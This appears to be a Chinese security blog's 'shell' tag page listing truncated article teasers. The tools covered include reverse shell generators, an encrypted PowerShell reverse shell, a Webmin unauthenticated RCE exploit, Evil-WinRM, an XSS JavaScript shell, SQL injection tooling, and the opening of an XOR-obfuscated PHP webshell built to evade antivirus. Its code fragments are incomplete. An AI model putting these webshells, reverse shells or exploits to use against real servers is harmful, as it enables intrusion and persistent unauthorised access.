shell

关注网络安全,网络安全博客

Python编写的反弹shell生成器:revshellgen

Python编写的反弹shell生成器:revshellgen

revshellgen反弹shell生成器独立的python shell生成脚本,用于轻松生成反弹shell,并自动化无聊的东西,如URL编码命令和设置监听器等。revshellgen反弹shell生成器revshellgen安装与使用安装...

一款Oracle数据库命令执行工具:oracleShell

一款Oracle数据库命令执行工具:oracleShell

oracleShell一款简约实用的Oracle数据库命令执行工具,基于java开发,所以是跨平台的,值得收藏。它有命令执行/文件管理/反弹shell的功能,所以你也可以把它当做shell管理工具来使用。截图...

Webmin 小于等于 1.920 – Unauthenticated RCE

Webmin 小于等于 1.920 – Unauthenticated RCE

EDB-ID: 47230CVE-2019-15107本日由 Vendor 在@defcon AppSec Village 发布,修复了这个漏洞。 Webmin 必须更新到1.930版本。Exploit-DB LinkCVE-Mitre LinkDownload defcon_webmin_unauth_rce.rb (Meta...

+免杀PHP一句话一枚

+免杀PHP一句话一枚

免杀PHP一句话shell,利用随机异或免杀D盾,免杀安全狗护卫神等<?php class VONE { function HALB() { $rlf = 'B' ^ "\x23"; $fzq = 'D' ^ "\x37"; $fgu = 'h' ^ "\x1b"; $sbe = 'R' ^ "\x37"; ...

单文件PHP shell脚本:p0wny@shell

单文件PHP shell脚本:p0wny@shell

p0wny @hell:单文件PHP Shellp0wny @hell 是一个非常基本的单文件PHP shell。当测试PHP应用程序时,它可用于在服务器上快速执行命令。请谨慎使用:此脚本表示服务器存在安全风险,它是类似于webshell的脚本...

CentOS/Linux内存占用大,用Shell脚本自动定时清除/释放内存

CentOS/Linux内存占用大,用Shell脚本自动定时清除/释放内存

以下情况可能造成Linux内存占用过高服务配置存在直接分配错误,或隐性分配不合理等程序有BUG被恶意流量数据包攻击资源配置与流量不科学都会造成服务器内存占用过高,出现访问延迟高,速度慢甚至挂机...

ReverseTCPShell:使用PowerShell通过TCP反弹加密Shell

ReverseTCPShell:使用PowerShell通过TCP反弹加密Shell

ReverseTCPShell 反弹加密shell一个通过TCP加密(AES 256位)反弹Shell的工具,使用PowerShell。使用攻击方 (C2-Server 监听):PS> .\ReverseTCP.ps1目标 (客户端):ECHO IEX([string](...

Evil-WinRM:用于渗透测试的终极Windows远程管理shell

Evil-WinRM:用于渗透测试的终极Windows远程管理shell

Evil-WinRM SHELLWinRM是什么?WinRM = Windows Remote Management,即Windows远程管理,以下简称WinRM。Evil-WinRM shell介绍此shell是用于渗透测试的终极WinRM shell。WinRM(Windows远程管理...

JShell  – 使用XSS获取JavaScript shell

JShell – 使用XSS获取JavaScript shell

JShell介绍JShell是一个使用XSS获取JavaScript shell的脚本,基于python。JShell安装与使用# 下载 $ git clone https://github.com/s0md3v/JShell.git# 使用 $ python shell.pyJShell将自...

jSQL Injection:一款自动化SQL注入工具,开源|免费|跨平台|强大

jSQL Injection:一款自动化SQL注入工具,开源|免费|跨平台|强大

jSQL Injection介绍jSQL Injection是一个轻量级SQL注入安全工具,用于从远程服务器中查找数据库信息。它是免费的,开源的和跨平台的(Windows,Linux,Mac OS X)。jSQL Injection也是官方渗透测试发行...